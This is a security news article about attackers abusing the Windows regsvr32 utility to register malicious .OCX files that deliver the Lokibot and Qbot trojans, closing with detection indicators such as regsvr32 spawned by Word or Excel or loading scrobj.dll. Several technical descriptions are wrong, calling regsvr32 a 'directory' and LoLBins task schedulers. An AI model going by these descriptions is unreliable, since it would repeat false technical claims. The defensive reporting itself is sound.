Microsoft's Regsvr32 is Actively Being Used For Silent Cyberattacks

Uptycs researchers have spotted a campaign where hackers are extensively using LoLBins, for evading detection in their operations. More specifically, the Windows regsvr32!

Regsvr32 is a legitimate Microsoft directory used for adding and removing operational commands. Since it’s legitimate, the traffic from and to it isn’t much inspected by security systems, thus attracting hackers to use it in their operations. It’s said to be leveraged for dumping Lokibot and Qbot trojans, spread through malicious documents.

Leveraging LoLBins For Spreading Trojans

As hackers come up with novel techniques to compromise a target, security OEMs are developing their tools to be better in detecting any kind of new vectors. But, they often fail when differentiating the good and bad traffic, which are now growing in popularity.

Hackers in the wild are leveraging LoLBins for their operations, as spotted by the Uptycs team. Living-off-land Bins (LoLBins) are legitimate tools used by OEMs for various purposes in regular system operations. They’re more like a central directory, where one can lodge a task that should be performed at a specified time and in a specified manner.

Microsoft’s Regsvr32 is one such LoLBin, used by various applications in the Windows OS for proper functioning. And since it’s a legitimate section, traffic passing through it isn’t considered malicious in most cases, by most security systems. And this belief is what captured hackers to use regsvr32 in their hacking operations.

Timeline of the samples leveraging regsvr32

Starting with a malicious document sent through email, hackers intend to install .OCX files in regsvr32, which contain trojans like Lokibot and Qbot. Researchers said they have spotted “more than 500+ malware samples using Regsvr32.exe to register .OCX files.”

And the initial malicious .OCX files are sent through Microsoft Excel, Microsoft Word, Rich Text Format data, or Composite Document. Advising everyone to be vigilant, researchers shared the below indicators to spot an infection;

  • Look for parent/child process relationships where Regsvr32 is executed with parent process of Microsoft Word or Microsoft Excel;
  • And, it can be identified by looking for Regsvr32 executions that load the scrobj.dll, which executes a COM scriptlet.

Other Trending News:-  News


Please enter your comment!
Please enter your name here